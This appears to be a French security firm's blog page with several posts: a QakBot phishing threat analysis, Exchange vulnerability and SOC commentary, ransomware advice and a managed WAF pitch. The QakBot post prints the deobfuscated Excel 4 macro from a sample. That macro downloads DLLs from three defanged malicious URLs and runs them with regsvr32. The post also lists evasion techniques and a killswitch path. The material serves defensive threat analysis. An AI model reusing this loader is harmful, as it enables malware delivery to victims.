[ VIDEO ] Course aux 0Days, au secours !!

[ VIDEO ] Race to the 0Days, help!

[ VIDEO ] Race to the 0Days, help!

Face aux 0Days, les équipes de cybersécurité sont bien souvent limitées et peuvent parfois se sentir démunies devant l’ampleur du phénomène qui ne fait que s’amplifier depuis ces dernières années.

Dans cette vidéo, notre expert Michael Molho, va vous donner 5 conseils pour atteindre un bon niveau de sécurité et vous aider à gérer au quotidien les 0days.

Recrudescence des campagnes de Phishing QakBot

Increase in QakBot phishing campaigns

Increase in QakBot phishing campaigns

Ces dernières semaines, le SOC At-Defense a observé une recrudescence de campagne de phishing Qakbot chez ses clients. Ces attaques utilisent la dernière version du malware QakBot existante (Version :403.549, campagne : 1647248933).
Une sensibilisation des équipes techniques et des utilisateurs finaux permet de réduire le risque d’une compromission par ce malware difficilement détectable par les mécanismes usuels de défense (filtre mail, Antivirus/EDR, etc.)

Description de la menace

QakBot est un trojan bancaire connu également sous le nom de QBot ou Pinkslipbot. C’est un malware répandu, actif depuis 2007, comportant de nombreuses variations suivant les groupes d’attaquants et les différentes campagnes. Ce malware est le plus souvent utilisé par des groupes criminels à des fins financières.
Une compromission par QakBot entraine généralement les actions suivantes :

Exécution du malware :
Sur le poste infecté des opérations de reconnaissances automatisées sont réalisées dès l’exécution du malware permettant de récupérer des informations sur l’utilisateur, ses droits, les groupes auxquels il appartient ainsi que des informations sur le système et les réseaux telles que le nom de la machine, la configuration IP, la liste des disques ou encore la table ARP.
QakBot charge ensuite des modules complémentaires permettant d’obtenir des informations plus sensibles comme les identifiants des comptes bancaires, les e-mails ou encore les mots de passes de l’utilisateur.
Lorsque le malware a récupéré suffisamment d’informations sur la cible, l’accès sur le système infecté est revendu à d’autres groupes d’attaquants. Ces groupes d’attaquants utilisent d’autres malware comme les ransomware pour chiffrer le système cible.

Communication avec les attaquants :
La connexion avec le serveur commande et de contrôle est effectuée à intervalle régulier pour diverses opérations. Parmi ces opérations on retrouve notamment :

  • La récupération de la dernière version du malware
  • L’exécution de commandes à distance
  • Le chargement des modules supplémentaires

La liste complète des adresses IP des serveurs est directement dans le code du malware et varie en fonction des campagnes.

Objectifs sur la cible :
L’accès ainsi obtenu peut ensuite être utilisé pour réaliser différentes actions sur objectif en fonction de l’environnement.

  • Cela inclus par exemple la récupération des mails du poste infecté
  • Le vol des cookies des navigateurs web
  • L’exécution d’un keylogger

Ces attaques peuvent également déboucher sur des exfiltrations d’informations sensibles ou des déploiements de ransomware visant à corrompre toutes les données de l’entreprise.

Vecteurs d’infections et défense évasions

Les différentes analyses des derniers cas recensés par le SOC At-Defense révèlent que le vecteur d’infection principalement utilisé par ce malware est le phishing email.
Nous avons observé deux méthodes permettant à l’utilisateur ciblé de récupérer le fichier malveillant Office depuis l’email :

  • Via une pièce jointe directement dans l’email
  • Via un lien vers une plateforme de partage en ligne (OneDrive, Mega, …)

Dans ces deux cas, le fichier Office est compressé dans une archive protégée par mot de passe et le mot de passe est inclus dans le contenu de l’email.
Ce type de technique permet de passer outre les mécanismes d’analyses des emails.

Exemple :

Le fichier Office extrait contient le code malveillant sous la forme de Macro, les extensions utilisées peuvent varier en fonction des campagnes (Ex : docm, xlsm, xlsb, …).

TTP

Les techniques, les tactiques et les procédures permettent de contextualiser les actions effectuées par les charges malveillantes sur un système cible. Elles permettent également de mettre en place des règles de détection sur les équipements de sécurité.

Tactic ID Name Description
Defense Evasion T1027 Obfuscated Files or Information QakBot XLM files are obfuscated and sheets are hidden.
Defense Evasion T1027.002 Obfuscated Files or Information: Software Packing Every binary and config is obfuscated and encrypted using RC4 cipher.
Execution, Persistence, Privilege Escalation T1053 Scheduled Task/Job QakBot creates tasks to maintain persistence.
Execution, Persistence, Privilege Escalation T1053.005 Scheduled Task/Job: Scheduled Task QakBot uses this TTP as a way of executing every time the malicious DLL.
Defense Evasion, Privilege Escalation T1055 Process Injection QakBot uses Process Injection to load into the memory some payloads.
Defense Evasion, Privilege Escalation T1055.001 Process Injection: Dynamic-link Library Injection DLL injection is used to load QakBot via rundll32 Windows utility.
Collection, Credential Access T1056 Input Capture QakBot collects credentials and sensitive data from the victim’s devices.
Discovery T1057 Process Discovery QakBot performs process discovery.
Discovery T1082 System Information Discovery QakBot obtains the list of processes and other details.
Discovery, Defense Evasion T1497 Virtualization/Sandbox Evasion Anti-VM and sandbox techniques are used to evade detection.
Discovery, Defense Evasion T1497.003 Virtualization/Sandbox Evasion: Time Based Evasion Time-based evasion is checked during the malware run time.
Discovery T1518 Software Discovery A list of the installed software is obtained.
Discovery T1518.001 Software Discovery: Security Software Discovery Installed AVs and other security software are obtained.

Analyse approfondie

L’analyse suivante détaille la méthode permettant d’obtenir le cœur du binaire malveillant.
Le cas présenté ci-dessous est un fichier Excel au format XSLB récupéré sur OneDrive. Le fichier XLSB inclut des Macro v4 (XLM).
Ce type de macro permet d’exécuter du code directement dans les cellules du fichier Excel, exemple :

Dans notre cas le code n’est pas directement visible dans le fichier Excel car plusieurs couches d’obfuscations ont été ajoutées pour accroitre la difficulté d’analyse.
Dans un premier temps les feuilles Excel contenants le code malveillant sont cachées :

Ensuite, les lignes de codes sont coupées dans des sous-cellules :

Le code malveillant est reconstruit dans les cellules de « QQDQ à QQDQ7 » :

Le code final réassemblé est le suivant :

[QQDQ]=CALL(« Kenel32″, »CeateDiectoyA », »JCJ », »C:\Bduc »,0)
[QQDQ1]=CALL(« ulmon », »URLDownloadToFilA », »JJCCBB »,0, »hxxps://mustafaksoy.com/UMWPpecHvg/gmkox.png », »C:\Bduc\xel1.dll »,0,0)
[QQDQ2]=EXEC(« regsvr32 C:\Bduc\xel1.dll »)
[QQDQ3]=CALL(« ulmon », »URLDownloadToFilA », »JJCCBB »,0, »hxxps://britcap.com/S4ABFgxnWO/gmkox.png », »C:\Bduc\xel2.dll »,0,0)
[QQDQ2]=EXEC(« regsvr32 C:\Bduc\xel2.dll »)
[QQDQ5]=CALL(« ulmon », »URLDownloadToFilA », »JJCCBB »,0, »hxxps://autoplacasdilger.com.br/ECg8m6oX27/gmkox.png », »C:\Bduc\xel3.dll »,0,0)
[QQDQ6]=EXEC(« regsvr32 C:\Bduc\xel3.dll »)
[QQDQ7]=RETURN()

Ce code télécharge et exécute 3 DLL malveillantes de QakBot.

Les DLL obtenues sont des binaires développés en Delphi incluant du code non utilisé par le malware.

L’objectif de ce supplément de code est d’accroître la difficulté d’analyse par les antivirus, car la grande majorité du code est légitime.

L’analyse des sections du code, révèle la présence d’une ressource non signée :

Cette ressource est chargée dynamiquement par la DLL puis déchiffrée à la volée dans une zone mémoire.

Le code malveillant injecté est ensuite exécuté.
Ce premier bout de code malveillant est utilisé pour créer un nouveau Thread. Le code malveillant est réinjecté et exécuté depuis le nouveau Thread.
La fonction dans le Thread vérifie si la machine est utilisée pour le développement du malware. Cette vérification est faite par la présence du fichier suivant :

« C:\\INTERNAL\\__empty »

Dans le cas où ce fichier existe le malware ne s’exécute pas. Cette fonctionnalité permet donc d’utiliser ce répertoire comme un « killswitch » du malware et ainsi éviter une contamination.
A ce stade nous disposons du cœur du malware QakBot, ce cœur varie en fonction des campagnes. Cependant le début est souvent le même :

1. Lancement d’un binaire légitime présent dans « C:\Windows\System32 », dans notre cas « explorer.exe ».

2. Création d’un thread dans un état suspendu dans le processus « explorer.exe »
3. Ecriture du code malveillant dans la mémoire du Thread distant du processus « explorer.exe »

4. Passage du thread en mode actif

Notre version ci-dessus créer une tache planifiée pour la persistance sur le système, ajoute des exceptions pour l’antivirus « Windows Defender », puis se connecte aux serveurs de commande et de contrôle pour signaler l’infection du poste.
Une fois les informations remontées au serveur de contrôle, le malware télécharge des modules supplémentaires sur le serveur de contrôle et les exécutes sur le système cible.
Le nombre de modules augmente et se complexifie au fil des campagnes.
Exemple des modules :

  • Collecte des informations sur la machine infectée
  • Collecte des informations d’identification : Identifiants Windows / Identifiants des naviguateurs web
  • Collecte des emails

Prévention et awareness

Le vecteur initial étant du phishing, les utilisateurs finaux jouent un rôle majeur dans la lutte contre cette menace.
Toutefois des actions techniques peuvent également être mises en place afin de réduire le risque de compromission.

Filtrage et analyse mail :
Il est difficile de se prémunir des mails propageant QakBot car les pièces jointes sont généralement chiffrées par un mot de passe ce qui empêche l’analyse dynamique. Il est cependant possible par exemple d’ajouter un bandeau d’avertissement lorsque l’email est reçu depuis l’extérieur de l’entreprise.

Sensibilisation des utilisateurs :
Les utilisateurs doivent être sensibilisés au risque de l’exécution des macros d’un fichier Office (Word, Excel…).
De plus les utilisateurs doivent être informés sur le risque de télécharger des archives (.zip, .7z…) chiffrées avec un mot de passe sur internet. Cette méthode d’envoi de malware est très connue et répandue car elle permet de contourner les dispositifs d’analyse antivirus présents au niveau de la passerelle mail.

Bonne pratique de sécurités :
Enfin l’application de bonnes pratiques de sécurités peuvent permettre d’empêcher, de bloquer ou de détecter et contenir l’attaque au plus tôt. Cela inclus par exemple l’utilisation d’un antivirus avec une composante EDR à jour ainsi que l’utilisation d’un SOC intégrant les derniers indices de compromissions.

Le SOC AT-Defense dispose de règles de détections efficace et éprouvée face à cette menace permettant une détection avant même la phase d’exécution.

[ Vulnérabilité #Log4J ] Formation, Synthèse & Information par nos experts.

[ Vulnerability #Log4J ] Training, Synthesis & Information by our experts.

[ Vulnerability #Log4J ] Training, Synthesis & Information by our experts.

Depuis jeudi 9 décembre, le tremblement de terre Log4j déclenche un vent de panique et de messages plus ou moins fiables dans notre quotidien professionnel.

Après quelques jours d’échanges avec nos fournisseurs, clients et partenaires, nous réalisons que cette crise est non seulement majeure mais surtout que son impact est encore mal apprécié.
Nos experts sont mobilisés 24h / 24h depuis vendredi dernier pour assister notre clientèle dans cette compréhension, l’élaboration de plan d’action et le développement d’outils logiciels de « threat hunting ».

D’où vient-elle ? Quels sont les composants impactés ? Comment se protéger ? Comment la détecter ? Que faire en cas de compromission ?
Autant d’interrogations auxquelles un de nos experts vous répond de la manière la plus claire et complète possible. Vous comprendrez notamment pourquoi les systèmes non exposés sur Internet sont concernés par cette attaque au même titre que les systèmes frontaux.

SOC AT-Defense en 2021

SOC AT-Defense in 2021

SOC AT-Defense in 2021

L’année 2021 a été marquée par la publication de nombreuses vulnérabilités. On peut citer entre autres les vulnérabilités liées au service Microsoft Exchange qui a connu à lui seul la publication de huit CVE réparties sur la période de Mars à Août 2021. Ces dernières portaient les noms de ProxyLogon (CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, et CVE-2021-27065) et Proxy Shell (CVE-2021-34473, CV-2021-34523, CVE-2021-31207). Ces vulnérabilités permettent la prise de contrôle et l’exécution de codes arbitraires sur n’importe quel serveur Exchange exposé sur Internet, qui plus est : sans authentification.  Via l’architecture des serveurs Exchange, ces failles donnent la possibilité d’élever ses privilèges au niveau d’administrateur de domaine (niveau le plus élevé d’autorisation dans le domaine). Ces vulnérabilités ont été massivement exploitées par différents groupes d’attaquants aux motivations diverses : financières via le vol de données et le déploiement de Ransomware ou étatiques. Par ailleurs, cela constitue également une porte d’entrée formidable pour des attaquants du fait l’exposition quasi obligatoire de ces environnements et la défaillance des processus de gestion des vulnérabilités d’autre part. Dans le cas de ProxyLogon par exemple, Microsoft a publié un correctif le 2 Mars 2021. Dans notre SOC « at-Defense », nous avons constaté des attaques sur nos clients dès le 3 Mars 2021 alors qu’il n’existait pas encore de code d’exploitation officiellement publié. Cette observation démontre bien la complexité du processus de gestion des vulnérabilités et de leur suivi qui doivent être effectués en « temps réel » pour prévenir ces attaques dans des fenêtres de temps extrêmement courtes. Et oui : les attaquants n’attendent pas les réunions d’appréciation de risques et les Change Advisory Board pour lancer leurs méfaits ! Cette période a été extrêmement chargée pour nos équipes. Outre la charge de travail induite sur notre service de monitoring des menaces (MSS « At-Defense »), nous étions également contactés par des entreprises qui n’étaient pas sous notre surveillance. Déclenchant ainsi des opérations de réponses à incident en urgence absolue et des investigations post-mortem (aka forensique). Et cela, plusieurs semaines après la publication des failles ; les clients se rendant compte de la compromission en générale par la présence d’un ransomware. Sur l’ensemble des investigations effectuées, nous avons noté un nombre important d’attaquants avec des motivations diverses et variées qui se promenaient allègrement sur le parc des clients en prenant le contrôle du domaine, exfiltrant des données et une fois « terminé » déployaient un ransomware pour augmenter leur profit.

Microsoft a quelque peu semé le trouble … Après une communication bien fournie sur la faille de mars, un grand nombre d’entreprises, ont pris conscience de l’urgence, et ont pu se préparer afin d’éviter le pire. Cependant, celle-ci a laissé passer la faille publiée en août (presque identique en termes d’impact) comme quasiment « inaperçue », laissant de nombreuses entreprises vulnérables pendant une large fenêtre de temps. Lors de nos travaux de réponses aux incidents, nous demandions quand le patch Exchange avait été appliqué. La réponse était systématiquement : mars 2021. Ces mêmes entreprises étaient donc bien exposées à la nouvelle faille parue en août.

Notre équipe a eu l’opportunité de travailler avec des entreprises concernées par l’affaire des « Pandora papers » – 11.9 millions de documents fuités et communiqués à l’International Consortium of Investigative Journalists (ICIJ). Des investigations forensiques effectuées pour ces mêmes clients dans le cadre d’attaque par ransomware sur la période d’octobre, nous ont permis de constater que ces clients étaient également impactés par les failles Exchange. De même, nos équipes ont pu retrouver des traces d’exploitations et de vols de données avérées en août 2021 sur au moins trois clients. Dans ces conditions, dès lors que le consortium de journaliste (ICIJ) disposait des informations dès le mois de septembre le lien de la fuite de données à travers l’exploitation de cette faille ne peut être complètement écarté…

Réponse aux incidents et forensique

Au sein de nos opérations « at-Defense », le rôle de nos experts en réponse aux incidents et analyses forensiques est primordial. On constate souvent que lors d’incident de type ransomware, les services IT effectuent une restauration de l’environnement (lorsque les sauvegardes sont encore accessibles) à une date postérieure à l’ultérieure. Cette approche ne fonctionne pas. En effet, si pendant un cambriolage le voleur récupère le double des clés, vous pouvez changer la fenêtre, ce dernier aura toujours la capacité de revenir.

La réponse aux incidents est un métier qui demande des compétences d’analyses évoluées, tant sur les aspects offensifs que défensifs, ainsi qu’un maintien continu des connaissances des schémas d’attaque et de défense. Les « Incident Responders » interviennent après une constatation d’incident ou un doute. Ils assistent le client souvent pendant plusieurs jours dans la remédiation correcte de son incident tout en fournissant un rapport et des conseils sur les implémentations à effectuer pour se prémunir de ces attaques. Ce travail de fourmis démarre d’une machine compromise pour retrouver le « patient zéro », la méthode d’intrusion initiale, les mouvements internes qu’il y a pu avoir entre les machines, les persistances laissées par l’attaquant, les outils utilisés par l’attaquant, le niveau de privilèges et d’accès dont disposaient les attaquants, les données exfiltrées etc.

Chez e-Xpert Solutions, nous privilégions systématiquement un contrôle à quatre yeux, impliquant deux analystes. La communication interne avec le board de direction ou conseil d’administration est un autre élément sensible dans lequel le spécialiste forensique contribue en apportant de précieux conseils tant sur la bonne démarche de retour en production que sur la communication avec les tiers (clients externes, partenaires, NCSC, organes de police, etc.)

Sans cette investigation avancée, repartir en production à partir d’une simple sauvegarde est le chemin assuré vers un nouvel incident dans les jours qui suivent. À ce jour, nous n’avons jamais eu à revenir chez un client après une réponse aux incidents.

Dans la panique, et sans doute par méconnaissances, nous observons régulièrement des entreprises qui s’adressent à des éditeurs de solutions (tels que des vendeurs d’antivirus) de sécurité pour leurs réponses aux incidents. L’approche d’un éditeur diffère de manière significative de celle des analystes et consistera en général en un traitement symptômatique plutôt que d’identifier la « root cause » de l’attaque. Vulgairement dit, ils appliqueront un sparadrap sur la blessure plutôt que d’en soigner la cause, en déployant un produit « miracle », qui au passage, détruit régulièrement les preuves primordiales à une investigation policière ou permettant simplement de remonter à la source de l’attaque.

Un SOC peut-il aider les entreprises à se prémunir de ces problèmes ?

Un Security Operations Center (ou SOC) tient un rôle fondamental : il a la charge de prévenir, détecter et répondre aux incidents de sécurité. Si votre SOC effectue son travail correctement, la partie analyse forensique approfondie (analyse disque, mémoire, etc) ne devrait jamais avoir lieu puisque la menace sera détectée suffisamment tôt et, ainsi, le risque prévenu.

Très concrètement le SOC repose sur plusieurs principes simples :

  • Être à jour sur les menaces
  • Collecter des informations venant de tous vos équipements liés à la sécurité
  • Normaliser ces informations pour être capable de croiser des données entre elles
  • Enrichir ces évènements collectés avec des informations de contexte (informations sur les utilisateurs, les systèmes, réputation d’IP, de domaines, infos géographiques etc.)
  • Centraliser ces informations (dans une solution appelée SIEM)
  • Corréler ces informations avec des indices de compromission connus (IOC) et appliquer des modèles de détection de menaces
  • Générer des alertes qui seront revus par les analystes
  • Répondre aux incidents
  • Fournir des rapports au management

Dans le cadre de nos activités, nous sommes aussi amenés à auditer d’autres SOC. Là encore, nous régulièrement les mêmes lacunes : sources de données manquantes, scope de collecte trop restreint, ou à l’inverse trop volumineuse et sans intérêt pour la corrélation et entrainant des coûts importants pour le client sans gain réel en terme de sécurité. Parfois les modèles de détection sont désuets et ne prennent pas en compte les indicateurs de compromission fournis par les organismes gouvernementaux pourtant facilement exploitables et gratuitement dans un nombre de cas. Ces lacunes se traduisent dans tous les cas en une capacité limitée à détecter des attaques même basiques.

Le conseil que nous pourrions donner est de choisir son prestataire sur des critères tangibles et mesurables dans son propre environnement. L’accompagnement par un conseil spécialisé du domaine peut être judicieux et permettra de mitiger l’ascendant psychologique de certains éditeurs ou autres « acteurs incontournables » du secteur. Concrètement, on demandera des évidences démontrant concrètement comment la technologie utilisée permet des détections avancées (analyses statistique, fréquence, anomalies, mouvements latéraux, etc) ? Quels sont les temps de réponse définis ? Le déploiement de la solution couvre-t-il l’ensemble de l’infrastructure du endpoint aux équipements réseau ? Y a-t-il des possibilités d’optimiser les coûts, notamment en filtrant du volume inutile à corréler en termes de sécurité ? Les exemples de reporting présentés sont-ils suffisamment clairs et utiles au-delà de l’esthétique graphique ou du nombre de pages ?  Le service dispose-t-il d’une certification garantissant des processus formels et établis telle que ISO  27001? Après avoir sélectionné un prestataire-candidat convaincant, le test ultime demeurera un « Proof Of Value » en couplant la solution proposée avec à un test d’intrusion effectué par un prestataire différent basé sur le framework MITRE ATT&CK. Cet exercice doit aboutir à des alarmes quasiment immédiates côté SOC. Dans le cas contraire : passer votre chemin.

Chez e-Xpert Solutions, nous mettons en œuvre l’ensemble des bonnes pratiques en termes de détection permettant de détecter des attaques connues mais également inconnues. En effet, sans disposer d’indicateurs ou de règles supplémentaires notre service était capable de détecter les attaques évoquées précédemment dès leur arrivée (avant le 2 mars). La technique utilisée est finalement assez simple : nous surveillons les exécutions de commandes ayant comme parent le service IIS (utilisé par MS Exchange). Si un des processus « fils » ne correspond pas à un modèle d’exécution vu sur les deux mois précédents, cela devient une anomalie. Cette approche nous a permis de détecter aisément les tentatives d’exploitations de ces vulnérabilités pour des clients non patchés. Nous surveillons également les vulnérabilités dites sensibles (exploitables publiquement sur des produits connus sans authentification) et prévenons nos clients sous forme de bulletin d’information important en avance de phase.

Comment se préparer à de telles attaques ?

Comme dans bien des domaines, l’anticipation est un enjeu majeur. Dans le cadre de nos activités de réponses aux incidents (clients non-SOC), nous constatons 9 fois sur 10 les mêmes lacunes liées à l’architecture du réseau ou aux systèmes :

Manque de suivi des patchs. Il convient de mettre en place une surveillance accrue des vulnérabilités et d’établir un processus de changements rapides (< 24h pour les vulnérabilités critiques sur les systèmes exposés)
Des réseaux dits « plats » ou chaque machine peut accéder à n’importe quelle autre machine sans couche « d’isolation », au niveau du réseau, entre les zones critiques. Un serveur Web compromis peut donc servir de rebond pour attaquer les autres machines du réseau.
Pas de filtrage des flux sortants vers Internet. Un attaquant peut aisément créer un canal de communication vers son environnement pour faciliter la prise de contrôle ou l’exfiltration de données.
Des problèmes au niveau de la sécurité liée aux authentifications notamment avec des mots de passe d’Administrateur local identique entre toutes les machines. On observe souvent ce cas quand le processus de déploiement de nouvelle machine est basé sur une « Gold Image ». Une solution gratuite est la mise en place de la technologie LAPS de Microsoft permettant de remédier efficacement à ce problème.
Des problèmes de sécurité au niveau Active Directory. Une solution simple consiste à utiliser l’outil PingCastle (gratuit) pour avoir un diagnostic rapide des problèmes de sécurité afin de pouvoir y remédier.
Absence de technologie de sécurité endpoint de type Endpoint Detection & Response (EDR). Celles-ci vont effectivement au-delà des capacités offertes par un antivirus classique. Il permet notamment de remonter des anomalies à un SOC qui pourra ainsi les analyser et les corréler.
Pas de centralisation des logs. Ce problème est malheureusement récurrent et met à risque l’ensemble de l’entreprise. Si une technologie de centralisation est mise en place en amont, l’intervention sera rapide, en moins d’une heure. Si ce n’est pas le cas, nous avons eu à faire des investigations pouvant durer 4 jours/nuits, avec des analyses lourdes et approfondies au niveau disque et mémoire.
Pas de service de Security Operations Center permettant de gérer, corréler les éléments remontés afin de détecter des menaces ou des anomalies.
Et bien sûr… la sensibilisation des utilisateurs aux risques de sécurité qui devrait être effectuée à minima une fois par an et surtout évaluée via des campagnes de phishing par exemple.

Ces éléments ne sont aujourd’hui plus des « Nice to have » mais bien des « Must have » pour faire face aux menaces qui ciblent les entreprises de petites ou de grandes tailles. Les attaquants ne faisant pas la différence.

Conseils et recommandations sur une attaque ransomware.

Advice and recommendations on a ransomware attack.

Advice and recommendations on a ransomware attack.

Découvrez les conseils et recommandations de notre expert, Simon Thoores sur une attaque de ransomware.

Quelles sont les cibles ? Les méthodes utilisées ? Que doit-on faire en cas d’attaque ? Comment se protéger ?

Le firewall applicatif, un “must” en mode managé !

The application firewall, a must in managed mode!

The application firewall, a must in managed mode!

Les dernières années ont vu une augmentation significative du développement d’applications web au détriment des applications natives.

Les avantages sont multiples. Côté utilisateur, la tâche est facilitée par le fait que les applications soient accessibles depuis n’importe où, n’importe quel périphérique et ce, sans nécessiter l’installation de logiciels spécifiques ou de clients lourds pour pouvoir être utilisées. Côté administrateur, plus besoin de maintenir à jour les versions de ces clients lourds ni de se soucier des prérequis système nécessaires sur les postes clients. Au final, cela se traduit par un cycle de vie de l’application simplifié et moins couteux.

Mais qu’en est-il au niveau de la sécurité intrinsèque à ces applications ? Nombre de ces applications, auparavant accessibles uniquement depuis le réseau interne de l’entreprise ou à travers un VPN, sont maintenant disponibles également depuis internet et depuis des périphériques non-maitrisés. Ceci les rend plus sensibles à d’éventuelles failles de sécurité et susceptibles de devenir la cible de pirates.

Qu’elles soient déployées “on-premises”, dans un cloud privé, public ou mises à disposition via un service Saas, il convient d’en protéger l’accès par la mise en place d’un firewall applicatif, Web Application Firewall ou WAF, qui au même titre que les applications qu’il protège, pourra également être hébergé ou fourni sous différentes formes.

 

Les compétences requises

Certains acteurs du marché promettent des firewalls applicatifs qui peuvent presque fonctionner tout seuls et sans besoin préalable de compétences en cybersécurité, notamment grâce au machine learning, l’intelligence artificielle ou plus simplement, l’utilisation de politiques de filtrage simplifies basées sur des standards tels que OWASP 10.

Mais la réalité est tout autre. Ceux ayant tenté de mettre en place de genre de solutions se sont heurtés à des problèmes bien plus complexes que celui de définir une politique de filtrage initiale.

Sans une personnalisation adéquate des politiques de sécurité, il y aura 2 possibilités ; soit le niveau de filtrage ne sera pas optimal, trop faible et donc potentiellement trop vulnérable face à des attaquants de plus en plus expérimentés ; soit dans le cas d’un filtrage trop restrictif, l’impact sur les utilisateurs sera trop important, risquant ainsi de mettre en péril le bon fonctionnement des applications. Comme on le sait dans tout projet de cybersécurité, l’adhérence des utilisateurs est extrêmement importante et il convient donc de trouver un juste milieu entre ces 2 extrêmes.

Certes, les outils de machine learning peuvent aider, par exemple à construire une politique de filtrage basée sur des recommandations en fonction du trafic web passé mais cela ne remplacera jamais les connaissances et le bon sens d’ingénieurs compétents et connaissant le fonctionnement des applications à protéger.

Compétences en programmation, réseau et la connaissance de l’application et des différents types d’attaques (Injection SQL et injection de code, Verb tampering, Cross-Site Scripting, session hijacking, brute force, etc) et une maitrise sans faille des architectures, langages et protocoles web, notamment HTTP, XML ou AJAX sont autant de caractéristiques indispensables.

On comprend aisément que les compétences nécessaires pour gérer une telle technologie de manière efficace sont rarement concentrées à l’intérieur d’une entreprise, et encore moins au sein d’une même équipe. Généralement l’interaction entre les équipes applicatives, réseau et sécurité est nécessaire, mais souvent la coopération entre les différents intervenants est laborieuse, chacun souhaitant garder uniquement la responsabilité sur la partie qui lui incombe à l’origine, l’efficacité dans la gestion du service s’en ressent donc fortement.

Notre service Managed WAF

Au vu de l’expérience acquise lors des nombreux projets implémentés au cours des dernières années et afin de répondre à cette problématique, e-Xpert Solutions a mis sur pied un service managé afin de fournir à ses clients une approche clé en main pour la gestion de leur WAF.

Nos ingénieurs prennent en charge les diverses étapes du cycle de vie d’un projet WAF, dont voici un extrait non-exhaustif :

  • Analyse des applications à protéger (technologies, langages, services mis à disposition, etc)
  • Définition d’une politique de filtrage initiale offrant un bon niveau de protection
  • Intégration dans les processus d’automatisation pour le déploiement de nouvelles applications
  • Application en mode non disruptif
  • Apprentissage du trafic de production
  • Personnalisation et fine-tuning de la politique
  • Intégration dans les processus de change management et réponse à incident du client
  • Mise en place en mode bloquant
  • Prise en charge des incidents, de l’analyse à la remédiation, en 24/7 si nécessaire et avec un niveau de SLA élevé
  • Mise à disposition d’un reporting temps réel avec une présentation mensuelle ou trimestrielle
  • Suivi des politiques déployées tout au long du cycle de vie des applications afin de s’inscrire dans un processus d’amélioration continue
  • Monitoring de l’état de santé des plateformes WAF sous-jacentes

    Côté commercial, une approche pragmatique, basée sur le nombre d’applications à protéger est proposée, ceci afin de répondre tant aux grands clients qu’à ceux plus modestes ou ne souhaitant protéger qu’une portion de leurs applications.

    N’hésitez pas à solliciter vos contacts usuels pour découvrir comment le service pourrait s’appliquer dans votre contexte et ainsi décharger vos équipes opérationnelles.

en_GB